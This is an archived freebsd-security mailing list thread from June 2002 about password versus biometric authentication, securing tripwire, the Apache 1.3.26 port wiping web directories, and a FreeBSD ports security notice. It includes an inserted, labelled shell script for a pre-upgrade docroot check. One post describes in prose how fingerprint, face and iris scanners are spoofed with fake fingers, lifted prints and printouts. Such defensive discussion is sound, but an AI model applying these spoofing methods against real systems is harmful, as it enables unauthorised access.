http://cryptome.org/gummy.htm

The other was an article in c't with a somewhat broader scope:

http://www.heise.de/ct/english/02/11/114/

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jun 19 8:43:39 2002
From: "Eric F Crist" To: "'Ryan Thompson'" Cc: Subject: RE: Password security Date: Wed, 19 Jun 2002 10:42:15 -0500 Message-ID: <002101c217a7$e3c28ab0$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020618225214.L74293-100000@ren.sasknow.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hey Ryan, The only other thing I could suggest is a dial-up callback system. Windows NT 4.0 and above fully support this in their base installs, and I'm sure it wouldn't be hard to setup on a FreeBSD network to do something similar. The way it works is this: User requests login authority from their remote system. He/she does so with a username/password combination. Remote network sees request, looks information up in a database and either calls back via a dial-up connection, or replies only on an IP address registered with the system. This way, it is your network that is bringing the connection up. It also restricts where users can log in from. (i.e. areas you, as network admin, deem secure). HTH Just curious, what kinds of things are you trying to secure that the basic password system hasn't worked for you? Most users are too ignorant (not their fault) to know how to do anything with their logins to hurt anything, as if your system *is* secure enough, biometrics or SecurID is a viable alternative. I personally have done work for people like the Minnesota Dept of Agriculture in this area for building and network security, and it has worked wonderfully for the last 4 years. Just curiousity on my part. 
;) Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- 
From: owner-freebsd-security@FreeBSD.ORG
[mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of Ryan Thompson
Sent: Wednesday, June 19, 2002 12:05 AM
To: Eric F Crist
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: Password security

Hi Eric,

Eric F Crist wrote to 'Ryan Thompson' and freebsd-security@FreeBSD.ORG:

> Have you explored the idea of biometrics?

Yes. Bad idea. I knew someone would suggest that. My original post was
too long already to include biometrics, so, since you asked, here it
is. :-)

> It requires a piece of hardware on each computer that is going to
> access the network, but the way you're making your security
> requirements sound, the security benefit is worth the cost.

Depending on the metric somewhat, collecting biometrics on insecure
systems is a serious security risk. Hardware costs aside (about 20
terminals, a few of which are home systems not even owned by the
company), it's far too easy to replay biometrics if the end system
isn't secure... and, last time I checked, most of my employees had only
10 fingers each. Once those are gone, what then? Eyeballs? :-)

So, on a lot of levels, biometrics are not an option. So, let's stick
with password security for now. :-)

> Eric F Crist
> President/Sys Admin
> AdTech Integrated Systems, Inc
> http://www.adtechintegrated.com

--
Ryan Thompson

SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4

Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon
Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Wed Jun 19 8:52:03 2002
From: "Eric F Crist"
To: "'Michael Sierchio'" , "'Dag-Erling Smorgrav'"
Cc: "'Ryan Thompson'" ,
Subject: RE: Password security
Date: Wed, 19 Jun 2002 10:51:01 -0500
Message-ID: <002201c217a9$1daf1300$77fe180c@armageddon>
In-Reply-To: <3D109329.8050007@tenebras.com>

I'm not advocating biometrics 100% here, I was simply offering another
solution to Ryan's problem. I've used biometrics in government
situations, where the budget will support it (State of MN), but most
companies cannot support the cost of a high quality biometric device.

Of course the technology is not perfect. Things such as cuts on your
finger and blood-shot eyes can still fool these systems, but password
technology has its faults too. It is possible to break into any system,
given the time to do your homework. Password systems with a username
token are the easiest to crack. I simply need two pieces of information,
and voila, I'm in. When you couple that with a specific host
requirement, I have to then spoof an IP address or some other token.
Biometrics, on the other hand, requires a little more work. If you
couple basic username/password token systems, a hardware or address
token, such as I-button/smart card and IP address, with either a retinal
scanner or palm print, or finger print, or voice recognition, there
becomes a greater amount of homework to be done to break into the
system.

Keep in mind, this is just my opinion. I'm awaiting your retorts.
;)

Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: Michael Sierchio [mailto:kudzu@tenebras.com]
Sent: Wednesday, June 19, 2002 9:20 AM
To: Dag-Erling Smorgrav
Cc: Eric F Crist; 'Ryan Thompson'; freebsd-security@FreeBSD.ORG
Subject: Re: Password security

Dag-Erling Smorgrav wrote:

> 1) Biometrics can't be used reliably for remote access.

There are zero-knowledge protocols for secure remote use of biometric
data.

> 2) I don't know of any currently available biometric authentication
> device that can't be easily fooled.

Somewhat misleading -- any biometric method of identification has false
positives and false negatives. For software engineers, this seems
unacceptable, since we're used to boolean values for Truth.

It's very useful for two-factor (or n-factor) authentication -- I have
no idea how extensive your familiarity with biometric methods is, but
several are quite promising. Some of the better ones (hand geometry)
aren't suited to embedding in a laptop...

From owner-freebsd-security Wed Jun 19 09:20:04 2002
To: "Eric F Crist"
Cc: "'Michael Sierchio'" , "'Ryan Thompson'" ,
Subject: Re: Password security
References: <002201c217a9$1daf1300$77fe180c@armageddon>
From: Dag-Erling Smorgrav
Date: 19 Jun 2002 18:19:54 +0200
In-Reply-To: <002201c217a9$1daf1300$77fe180c@armageddon>

"Eric F Crist" writes:
> Of course the technology is not perfect. Things such as cuts on your
> finger and blood-shot eyes can still fool these systems, but password
> technology has its faults too.

These are false negatives, which are annoying but tolerable. I'm more
worried about false positives, and from what I can see they're far too
easy to provoke.

> Biometrics, on the other hand, requires a little more work. If you
> couple basic username/password token systems, a hardware or address
> token, such as I-button/smart card and IP address, with either a retinal
> scanner or palm print, or finger print, or voice recognition, there
> becomes a greater amount of homework to be done to break into the
> system.

Not when the biometric device is so easy to fool that it becomes
practically irrelevant. Then the "passwords & fingerprints" scheme is
reduced to just "passwords & warm fuzzy feelings".

It has been shown empirically that "state of the art" biometric devices
can be fooled by any amateur with a little ingenuity and less than $50
in supplies. Some fingerprint scanners are so bad they can be tricked
into scanning and accepting the latent print left on their surface from
the previous time they were used. Others will accept an image of a
fingerprint lifted from, say, your coffee mug. Yet others are
vulnerable to trivial replay attacks.
All of them are vulnerable to fake fingers (made of silicone or
agar-agar) whose "fingerprint" can be reconstructed from a mold, or from
a latent fingerprint (coffee mug again) made three-dimensional with a
hobby PCB etching kit. Facial recognition systems have been tricked by
photographs (or video clips for those with "live subject" safeguards)
of the subject. Iris recognition systems have been tricked with
printouts of an image of the subject's iris, with a hole cut in the
middle for the attacker to see through.

The fact that vendors have reacted by either denying the results or
just refusing to discuss them does not increase my faith in the
biometrics industry.

I will not trust any biometric device until vendors start openly
acknowledging and discussing possible attacks, and publishing the
methods they use to resist them.

DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jun 19 09:49:07 2002
Message-ID: <20020619164844.42032.qmail@web10103.mail.yahoo.com>
Date: Wed, 19 Jun 2002 09:48:44 -0700 (PDT)
From: twig les
Subject: Re: Password security
To: Dag-Erling Smorgrav , Eric F Crist
Cc: 'Michael Sierchio' , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG

Dag, you have some very good points regarding Biometrics, but one thing
that scares me about them that hasn't been mentioned (that I've seen)
is that once your fingerprint is stolen it can never be trusted again.
Same with a palm print, etc. If someone gets into the company database
and nabs these things then replay attacks can follow you for years.
Not likely, but possible. When you quit a job that uses a handscanner
for data center access, what do they do with your print? I doubt they
delete it and write over it 12+ times.

Eric has a good point also though. The point of security (in my view)
isn't to stop all attacks. It's to stop almost all of them, while
increasing the time and effort it takes the really good attacks to
succeed. If you're running a NIDS and/or tripwire type thingies, then
increasing the penetration time should allow you to react.

As for the initial problem... I would take the lazy admin way out and
upgrade the windoze SSH client to one that uses keys AND passwds (like
ssh.com). You can give your users their key on a floppy with a notepad
file on how to install this client on their home machine and where to
put the key. Then have them chmod 700 C:\Windo...hmmm. Sorry.

This solution kind of sucks, but it's simple and users won't go out of
their way to subvert it. With all the other precautions you're taking
it should work fine though. Also, maybe enforce 15 minute,
passwd-protected screensavers on their boxes with a script they don't
know exists.
--- Dag-Erling Smorgrav wrote:
> "Eric F Crist" writes:
> > Of course the technology is not perfect. Things such as cuts on your
> > finger and blood-shot eyes can still fool these systems, but password
> > technology has its faults too.
>
> These are false negatives, which are annoying but tolerable. I'm more
> worried about false positives, and from what I can see they're far too
> easy to provoke.
> [...]

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

From owner-freebsd-security Wed Jun 19 09:55:12 2002
Message-ID: <20020619165507.43204.qmail@web10103.mail.yahoo.com>
Date: Wed, 19 Jun 2002 09:55:07 -0700 (PDT)
From: twig les
Subject: Re: preventing tampering with tripwire
To: Maxlor , "freebsd-security@FreeBSD.ORG"
In-Reply-To: <2799555.1024487443@[10.0.0.16]>

> - Change kern.securelevel to 1. This prevents modifying any file
> which has the schg flag set. The securelevel cannot be lowered
> without a reboot. I've got to think a bit about how to prevent a
> lowering through rebooting... maybe schg'ing /etc/rc and /etc/rc.conf?

I bet an attacker would be pretty annoyed if he rooted your box, knew
FreeBSD well enough to know the schg trick, rebooted, then found out
that you had set a BIOS passwd. He'd have to be local and have a
screwdriver :). Of course your remote admin would take a hit so it's up
to circumstances whether you can do that or not.

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

From owner-freebsd-security Wed Jun 19 10:01:50 2002
Date: Wed, 19 Jun 2002 11:01:06 -0600 (CST)
From: Ryan Thompson
To: Klaus Steden
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Password security
In-Reply-To: <20020619013603.O99167@cthulu.compt.com>
Message-ID: <20020619104812.W14256-100000@ren.sasknow.com>

Klaus Steden wrote to Ryan Thompson:

> In the meantime, you could crack them on a regular basis for them.
> John the Ripper does a pretty good job of my password files, with a
> dictionary of about 6 million odd words.

Done that. About 10% of the passwords fell within the first 10 minutes.
After 36 hours on a PII-400MHz machine, I had done only a little better
than that. That's probably *better* than many systems, but as long as
one staff member's account can be easily compromised, I won't take much
comfort in being "more secure" than the next network. :-)

Ironically, our untrained customers seem to be at least as good as our
trained staff members at choosing secure passwords. Knowledge and
practice are clearly two orthogonal axes. :-) So, that's why I'm making
an effort to mandate stronger passwords for staff members. (Customers
are limited to chroot()'d FTP logins only, and staff members can be
trained and encouraged to follow directions.
:-)

- Ryan

-- 
Ryan Thompson
SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4
Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon
Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Wed Jun 19 10:02:00 2002
To: twig les
Cc: Eric F Crist , 'Michael Sierchio' , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG
Subject: Re: Password security
References: <20020619164844.42032.qmail@web10103.mail.yahoo.com>
From: Dag-Erling Smorgrav
Date: 19 Jun 2002 19:01:38 +0200
In-Reply-To: <20020619164844.42032.qmail@web10103.mail.yahoo.com>

twig les writes:
> As for the initial problem... I would take the lazy admin way out and
> upgrade the windoze SSH client to one that uses keys AND passwds (like
> ssh.com). You can give your users their key on a floppy with a
> notepad file on how to install this client on their home machine and
> where to put the key.

That might be doable if you can somehow force users to pick good
passphrases for their keys, but it doesn't defend against keyboard
sniffing or a trojaned ssh client.

I'd use OPIE, though you need a trusted, portable device (such as a
PDA) for computing responses, otherwise someone could trojan your OPIE
calculator and snarf your passphrase.
DES
-- 
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Wed Jun 19 10:03:18 2002
Subject: Re: Apache 1.3.26 port
From: Jan Lentfer
To: Ken Menzel
Cc: freebsd-security@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG
In-Reply-To: <004b01c217b1$6ff56a80$681663cf@icarz.com>
References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619112415.A55069@cowbert.2y.net> <1024500871.3d10a487acc8e@www-mail.lan> <004b01c217b1$6ff56a80$681663cf@icarz.com>
Date: 19 Jun 2002 19:02:01 +0200
Message-Id: <1024506121.2846.2.camel@jan-linux.lan>

On Wed, 2002-06-19 at 18:50, Ken Menzel wrote:
> "make reinstall" worked just fine for me, except I need to comment
> out mod_define and recompile php (make; make reinstall;).
>
> Hope this helps
> Ken

Actually I was also wondering a little why it didn't complain about
"make install" - it just went ahead.

On my production machine at university I also had to comment out
mod_define (what's that for??) and recompile mod_php4 and mod_fastcgi
(for Zope). It seems to work ok now (PHProjekt and Zope through Apache).

Jan

From owner-freebsd-security Wed Jun 19 10:08:12 2002
From: graham
To: freebsd-security@FreeBSD.ORG
Subject: Re: Password security
Date: Wed, 19 Jun 2002 14:20:30 -0230
In-Reply-To: <20020619164844.42032.qmail@web10103.mail.yahoo.com>
Message-Id: <02061914352901.22345@hercules.avint.net>

It's a lot easier to fool Biometrics than you think.

I saw an episode of @discovery on The Discovery Channel's Canadian
channel explaining how a mathematician and some grad students could
fool all the current commercial biometric systems with common household
items available from any supermarket. But I don't fully remember the
details of that particular episode.

On Wed, 19 Jun 2002, twig les wrote:
> Dag, you have some very good points regarding Biometrics, but one
> thing that scares me about them that hasn't been mentioned (that I've
> seen) is that once your fingerprint is stolen it can never be trusted
> again.
> [...]

From owner-freebsd-security Wed Jun 19 10:20:11 2002
Message-ID: <20020619171922.48193.qmail@web10103.mail.yahoo.com>
Date: Wed, 19 Jun 2002 10:19:22 -0700 (PDT)
From: twig les
Subject: Re: Password security
To: graham , freebsd-security@FreeBSD.ORG
In-Reply-To: <02061914352901.22345@hercules.avint.net>

--- graham wrote:
> It's a lot easier to fool Biometrics than you think.
> I saw an episode of @discovery on The Discovery Channel's Canadian
> channel explaining how a mathematician and some grad students could
> fool all the current commercial biometric systems with common
> household items available from any supermarket. But I don't fully
> remember the details of that particular episode.

I don't doubt it (although I missed the special), but I don't know
anyone who advocates the use of biometrics as the sole method of
authentication (US airport security aside...). Most of the time I've
used them you either needed a badge with it, or a badge/PIN combo. The
addition of biometrics to a badge or badge/PIN combo (even if it was
tuned to give more false positives than negatives) makes a huge
difference.

So what interests me is could these guys beat the handprint reader
WHILE they have a stolen/forged smartcard AND someone's PIN code (all
matching the same person of course)? If they can do that then my hat
is off to them and they should be Sneakers 2.

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

From owner-freebsd-security Wed Jun 19 11:20:40 2002
Date: Wed, 19 Jun 2002 21:20:35 +0300 (EAT)
From: Noah K Sematimba
To: Jan Lentfer
Cc: Ken Menzel , ,
Subject: Re: Apache 1.3.26 port
In-Reply-To: <1024506121.2846.2.camel@jan-linux.lan>
Message-ID: <20020619211914.A79940-100000@favour.one2net.co.ug>

Forgive me for the OT, but php4 apparently will not compile with the
new apache 2.0.39; some error concerning pth.

Noah.

On 19 Jun 2002, Jan Lentfer wrote:
> On Wed, 2002-06-19 at 18:50, Ken Menzel wrote:
> [...]

From owner-freebsd-security Wed Jun 19 11:32:20 2002
From: "Eric F Crist"
To: "'twig les'" , "'graham'" ,
Subject: RE: Password security (my final post on this particular thread)
Date: Wed, 19 Jun 2002 13:30:56 -0500
Message-ID: <004101c217bf$74a26f70$77fe180c@armageddon>
In-Reply-To: <20020619171922.48193.qmail@web10103.mail.yahoo.com>

It's apparent that this conversation could go on forever. It is also
apparent that Ryan Thompson (original poster) is in search of a 100%
foolproof method of authentication, which all of us know doesn't
exist.

Basically, we all seem to have come to the consensus that:

1) Password security is not perfect due to the inability of most
people/users of data networks to remember and conjure up difficult,
complex, or hard to guess passwords.

2) Biometrics is not a foolproof method of authentication and there are
ways to trick these devices.

3) The generally agreed upon method for the most secure method of
authentication over a seemingly insecure data network would be to
combine a multitude of different technologies, all dependent on each
other.

Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of twig les
Sent: Wednesday, June 19, 2002 12:19 PM
To: graham; freebsd-security@FreeBSD.ORG
Subject: Re: Password security

--- graham wrote:
> It's a lot easier to fool Biometrics than you think.
> I saw an episode of @discovery on The Discovery Channel's
> Canadian channel explaining how a mathematician and some grad
> students could fool all the current commercial biometric systems
> with common household items available from any supermarket.
> But I don't fully remember the details of that particular episode.
>

I don't doubt it (although I missed the special), but I don't know anyone who advocates the use of biometrics as the sole method of authentication (US airport security aside...). Most of the time I've used them you either needed a badge with it, or a badge/PIN combo. The addition of biometrics to a badge or badge/PIN combo (even if it was tuned to give more false positives than negatives) makes a huge difference.

So what interests me is could these guys beat the handprint reader WHILE they have a stolen/forged smartcard AND someone's PIN code (all matching the same person of course)? If they can do that then my hat is off to them and they should be Sneakers 2.

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------
From owner-freebsd-security Wed Jun 19 12:14:53 2002
Message-ID: <004b01c217b1$6ff56a80$681663cf@icarz.com>
From: "Ken Menzel"
To: "Jan Lentfer"
Cc: ,
References: <1024460049.2166.6.camel@jan-linnb.lan> <20020619112415.A55069@cowbert.2y.net> <1024500871.3d10a487acc8e@www-mail.lan>
Subject: Re: Apache 1.3.26 port
Date: Wed, 19 Jun 2002 12:50:35 -0400

"make reinstall" worked just fine for me, except I need to comment out mod_define and recompile php (make; make reinstall;).

Hope this helps
Ken

----- Original Message -----
From: "Jan Lentfer"
Cc: ;
Sent: Wednesday, June 19, 2002 11:34 AM
Subject: Re: Apache 1.3.26 port

> Quoting "Peter C. Lai":
>
> > did you use portupgrade to upgrade?
>
> No, just "make all install clean"
>
> Jan
>
> -------------------------------------------------
> This mail sent through IMP: http://horde.org/imp/

From owner-freebsd-security Wed Jun 19 14:10:36 2002
Message-Id: <4.3.2.7.2.20020619150748.0236b1d0@localhost>
Date: Wed, 19 Jun 2002 15:10:06 -0600
To: Jan Lentfer , freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Apache 1.3.26 port
In-Reply-To: <1024460049.2166.6.camel@jan-linnb.lan>

Yes, installing the new port will nuke all of your data. And, as has been the case with many other ports, the package has not been built and put up on the FTP site. Everyone who installs FreeBSD and elects to install Apache across the Net will get the insecure version of Apache until this is fixed. It's just as important to upgrade the binary packages (and/or mark them as "forbidden") as it is the ports.

--Brett

At 10:14 PM 6/18/2002, Jan Lentfer wrote:
>Hi,
>
>i am new to this list, so I don't know if this is the right place for my
>comment, so please be gentle ;-)
>
>After reading all the mail about the apache vulnerability, today I
>installed the new 1.3.26 port. The compilation, etc. went clean, I also
>had to reinstall mod_php4 and mod_fastcgi until I could make apache
>start. Then I found that all my subdirectories in /usr/local/data/www
>were gone (deleted)!! Luckily this was on my private machine! Is this a
>normal behaviour?
>Anyway, it's good I know it now so I will for sure
>backup the directories on my production machines
>
>Regards,
>
>Jan Lentfer

From owner-freebsd-security Wed Jun 19 14:14:26 2002
Date: Wed, 19 Jun 2002 14:14:18 -0700
Subject: Re: Apache 1.3.26 port
From: Jason DiCioccio
To: Brett Glass , Jan Lentfer ,
In-Reply-To: <4.3.2.7.2.20020619150748.0236b1d0@localhost>

I would consider this semi-correct, at least from my experience. The data directories ARE separated out. Notice that there is a data.default and a cgi-bin.default which data and cgi-bin are linked to. If you break the data/cgi-bin symlinks and just mkdir data/mkdir cgi-bin, your data should not be overwritten, it should only overwrite data.default.

If this is another issue, I haven't encountered it.

Cheers,
-JD-

On 6/19/02 2:10 PM, "Brett Glass" wrote:

> Yes, installing the new port will nuke all of your data.

[snip]

> At 10:14 PM 6/18/2002, Jan Lentfer wrote:
>
>> Hi,
>>
>> i am new to this list, so I don't know if this is the right place for my
>> comment, so please be gentle ;-)
>>
>> After reading all the mail about the apache vulnerability, today I
>> installed the new 1.3.26 port. The compilation, etc. went clean, I also
>> had to reinstall mod_php4 and mod_fastcgi until I could make apache
>> start. Then I found that all my subdirectories in /usr/local/data/www
>> were gone (deleted)!! Luckily this was on my private machine! Is this a
>> normal behaviour?
>> Anyway, it's good I know it now so I will for sure
>> backup the directories on my production machines

[snip]

From owner-freebsd-security Wed Jun 19 14:24: 1 2002
Message-ID: <200206191723590704.0033D6FF@mail.speakeasy.net>
Date: Wed, 19 Jun 2002 17:23:59 -0400
Reply-To: jdarnold@buddydog.org
From: "Jonathan Arnold"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port

>I would consider this semi-correct, at least from my experience. The data
>directories ARE separated out. Notice that there is a data.default and a

I, in fact, just went through this and would beg to differ. It is not very kind to delete a complete directory tree without any warning, either when you install (something like "data.default *WILL BE REPLACED ON UPGRADE*") or it should check on upgrade and not remove it if it is there. I lost my entire web site with nary a peep, and luckily had the most important stuff on another computer.

Nothing, anywhere, says anything about data.default getting overwritten / replaced on upgrade.

--
Jonathan Arnold (mailto:jdarnold@buddydog.org)
The Incredible Brightness of Seeing, a Home Theater weblog
http://jdarnold.tzo.com/HomeTheater

From owner-freebsd-security Wed Jun 19 14:33:56 2002
Message-Id: <4.3.2.7.2.20020619153117.0230db10@localhost>
Date: Wed, 19 Jun 2002 15:33:12 -0600
To: Jason DiCioccio , Jan Lentfer ,
From: Brett Glass
Subject: Re: Apache 1.3.26 port
References: <4.3.2.7.2.20020619150748.0236b1d0@localhost>

Interestingly, if you compile Apache from the tarball provided on the Apache Project's Web server, and use its "make install", it won't overwrite your data or your existing configuration. It's an artifact of the port. To prevent problems, I'm installing right from the Apache tarball and not using the port.

--Brett

At 03:14 PM 6/19/2002, Jason DiCioccio wrote:
>I would consider this semi-correct, at least from my experience. The data
>directories ARE separated out. Notice that there is a data.default and a
>cgi-bin.default which data and cgi-bin are linked to. If you break the
>data/cgi-bin symlinks and just mkdir data/mkdir cgi-bin, your data should
>not be overwritten, it should only overwrite data.default.
>
>If this is another issue, I haven't encountered it.
>
>Cheers,
>-JD-

From owner-freebsd-security Wed Jun 19 14:43: 7 2002
Message-Id: <4.3.2.7.2.20020619153728.02374d30@localhost>
Date: Wed, 19 Jun 2002 15:42:40 -0600
To: Jason DiCioccio , Jan Lentfer ,
From: Brett Glass
Subject: Re: Apache 1.3.26 port
References: <4.3.2.7.2.20020619150748.0236b1d0@localhost>

P.S. -- While Apache's own "make install" is gentler on your data files than the current port, one thing it does that is *not* good, and persists in the port, is install things, out of the box, that the administrator might not want. For example, it always installs its own documentation and makes it publicly available from your server. A security risk? Probably not, but still not a good thing.

Even experienced admins, such as the administrators of the FreeBSD Web site, often don't catch this problem. For example, if you go to http://www.freebsd.org/manual/ you will find -- guess what? -- the Apache manual, not a FreeBSD manual as you might expect. Apache's default httpd.conf creates an alias for its documentation at this location unless you edit the alias out of httpd.conf. The FreeBSD port/package of Apache should, IMHO, turn this off.

From owner-freebsd-security Wed Jun 19 14:48:10 2002
Date: Wed, 19 Jun 2002 15:47:36 -0600 (CST)
From: Ryan Thompson
To: Eric F Crist
Cc: freebsd-security@FreeBSD.ORG
Subject: RE: Password security
In-Reply-To: <002101c217a7$e3c28ab0$77fe180c@armageddon>
Message-ID: <20020619153600.U32240-100000@ren.sasknow.com>

Eric F Crist wrote to 'Ryan Thompson':

> Just curious, what kinds of things are you trying to secure that the
> basic password system hasn't worked for you?

Enough valuable company data to *not* trust staff passwords with an effective 20-30 bits of entropy. :-) Even most "well-chosen" passwords that can be remembered have very limited entropy. (With the exception of good approaches like that suggested by Bill M).

The point of my original post (which is being rather clouded by some of these very interesting replies :-) was to do a little (or a lot) better than the passwords that users typically pick, with the use of a human-readable generated token system, as opposed to simply remembering a shared secret that can be broken with a dictionary attack plus brute force in a matter of hours.

> I personally have done work for people like the Minnesota Dept of
> Agriculture in this area for building and network security, and it
> has worked wonderfully for the last 4 years. Just curiosity on my
> part.
> ;)

Understood :-)

- Ryan

--
Ryan Thompson
SaskNow Technologies - http://www.sasknow.com
901 1st Avenue North - Saskatoon, SK - S7K 1Y4
Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon
Toll-Free: 877-727-5669 (877-SASKNOW) North America

From owner-freebsd-security Wed Jun 19 14:49:54 2002
Date: Wed, 19 Jun 2002 14:49:41 -0700
Subject: Re: Apache 1.3.26 port
From: Jason DiCioccio
To: ,
In-Reply-To: <200206191723590704.0033D6FF@mail.speakeasy.net>

I agree :).. Sort of like it does when you upgrade MySQL. I can see that it's why they have a data.default/cgi-bin.default, but it should let you know as well. I'm confused as to what you're saying though. Are you saying that it overwrote your data directory even though it was not pointing to data.default? Or are you saying that it was linked to data.default and you think (as well as I) that it should let you know before blowing data.default away (perhaps a make flag)?

Cheers,
-JD-

On 6/19/02 2:23 PM, "Jonathan Arnold" wrote:

>> I would consider this semi-correct, at least from my experience. The data
>> directories ARE separated out. Notice that there is a data.default and a
>
> I, in fact, just went through this and would beg to differ. It is not
> very kind to delete a complete directory tree without any warning, either
> when you install (something like "data.default *WILL BE REPLACED ON
> UPGRADE*") or it should check on upgrade and not remove it if it is there.
> I lost my entire web site with nary a peep, and luckily had the most important
> stuff on another computer.
>
> Nothing, anywhere, says anything about data.default getting overwritten /
> replaced on upgrade.
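A pre-upgrade check for the data -> data.default layout discussed in the messages above, written as an added example (it is not code from the apache13 port or from anyone on this thread). It assumes the port's /usr/local/www prefix, that data and cgi-bin are installed as symlinks to data.default and cgi-bin.default, and that a reinstall removes the .default trees with rm -rf, as the thread describes; apache_detach_docroot applies the workaround Jason suggests (replace the symlink with a real directory holding a copy of the content).

```shell
#!/bin/sh
# Added example: pre-upgrade check for the apache13 port's data.default /
# cgi-bin.default layout. Not part of the port. Assumes DIR (e.g.
# /usr/local/www/data) is a symlink to DIR.default and that reinstalling
# the port runs "rm -rf DIR.default".

# Print the physical path a directory (or a symlink to one) resolves to.
resolve_dir() {
    (cd -P -- "$1" 2>/dev/null && pwd -P)
}

# Classify DIR against DIR.default. Prints one of:
#   missing  - DIR does not exist
#   safe     - DIR is a real directory distinct from DIR.default
#   empty    - DIR resolves to DIR.default, which holds no files
#   at-risk  - DIR resolves to DIR.default and DIR.default holds files,
#              so the reinstall's rm -rf would delete the live site
apache_docroot_status() {
    dir=$1
    dflt="$1.default"
    [ -d "$dir" ] || { echo missing; return 0; }
    if [ ! -d "$dflt" ] || [ "$(resolve_dir "$dir")" != "$(resolve_dir "$dflt")" ]; then
        echo safe
        return 0
    fi
    if [ -n "$(find "$dflt" -type f 2>/dev/null | head -n 1)" ]; then
        echo at-risk
    else
        echo empty
    fi
}

# Replace the DIR -> DIR.default symlink with a real directory that holds a
# copy of the content, so rm -rf on DIR.default no longer reaches the site.
# Returns non-zero (and changes nothing) unless DIR is in the at-risk state.
apache_detach_docroot() {
    dir=$1
    dflt="$1.default"
    [ "$(apache_docroot_status "$dir")" = at-risk ] || return 1
    [ -L "$dir" ] || return 1            # only the symlink layout is handled
    tmp="$dir.detach.$$"
    mkdir "$tmp" || return 1
    cp -Rp "$dflt/." "$tmp/" || { rm -rf "$tmp"; return 1; }
    rm "$dir" && mv "$tmp" "$dir"
}

# Check both directories the port's patch touches; non-zero exit means at
# least one of them would lose data on reinstall.
apache_preupgrade_check() {
    prefix=${1:-/usr/local/www}
    rc=0
    for d in "$prefix/data" "$prefix/cgi-bin"; do
        st=$(apache_docroot_status "$d")
        echo "$d: $st"
        [ "$st" = at-risk ] && rc=1
    done
    return $rc
}
```

Run apache_preupgrade_check before "make reinstall"; a non-zero exit means apache_detach_docroot (or a backup) is needed first.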
From owner-freebsd-security Wed Jun 19 14:51:43 2002
Date: Wed, 19 Jun 2002 14:50:20 -0700 (PDT)
Message-Id: <200206192150.g5JLoKG06920@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Notice FreeBSD-SN-02:04
Reply-To: security-advisories@freebsd.org

=============================================================================
FreeBSD-SN-02:04                                              Security Notice
                                                          The FreeBSD Project

Topic:          security issues in ports

Announced:      2002-06-19

I.   Introduction

Several ports in the FreeBSD Ports Collection are affected by security issues. These are listed below with references and affected versions. All versions given refer to the FreeBSD port/package version numbers. The listed vulnerabilities are not specific to FreeBSD unless otherwise noted.

These ports are not installed by default, nor are they ``part of FreeBSD'' as such. The FreeBSD Ports Collection contains thousands of third-party applications in a ready-to-install format. FreeBSD makes no claim about the security of these third-party applications. See for more information about the FreeBSD Ports Collection.

II.  Ports

+------------------------------------------------------------------------+
Port name:      apache13, apache13-modssl, apache13-ssl, apache13+ipv6,
                apache13-fp, apache2
Affected:       versions < apache-2.0.39 (apache2)
                versions < apache-1.3.26 (apache13)
                versions < apache+mod_ssl-1.3.26+2.8.9 (apache13-modssl)
                All versions (others)
Status:         Fixed (apache2, apache13, apache13-modssl)
                Not fixed (others)

Denial-of-service involving chunked encoding.

+------------------------------------------------------------------------+
Port name:      bind9
Affected:       versions < bind9-9.2.1
Status:         Fixed

Denial-of-service vulnerability in named.
+------------------------------------------------------------------------+
Port name:      courier-imap
Affected:       versions < courier-imap-1.4.3_1
Status:         Fixed

Remote denial-of-service attack (CPU utilization).

+------------------------------------------------------------------------+
Port name:      ethereal
Affected:       versions < ethereal-0.9.4
Status:         Fixed

Buffer overflows in SMB, X11, DNS, and GIOP dissectors.

+------------------------------------------------------------------------+
Port name:      fakebo
Affected:       versions < fakebo-0.4.1_1
Status:         Fixed

Format string vulnerability.

+------------------------------------------------------------------------+
Port name:      fragroute
Affected:       versions < fragroute-1.2_1
Status:         Fixed

The distribution file with MD5 checksum 65edbfc51f8070517f14ceeb8f721075 was trojaned.

+------------------------------------------------------------------------+
Port name:      ghostscript-gnu
Affected:       versions < ghostscript-6.53
Status:         Fixed

A PostScript file can cause arbitrary commands to be executed as the user running ghostscript.

+------------------------------------------------------------------------+
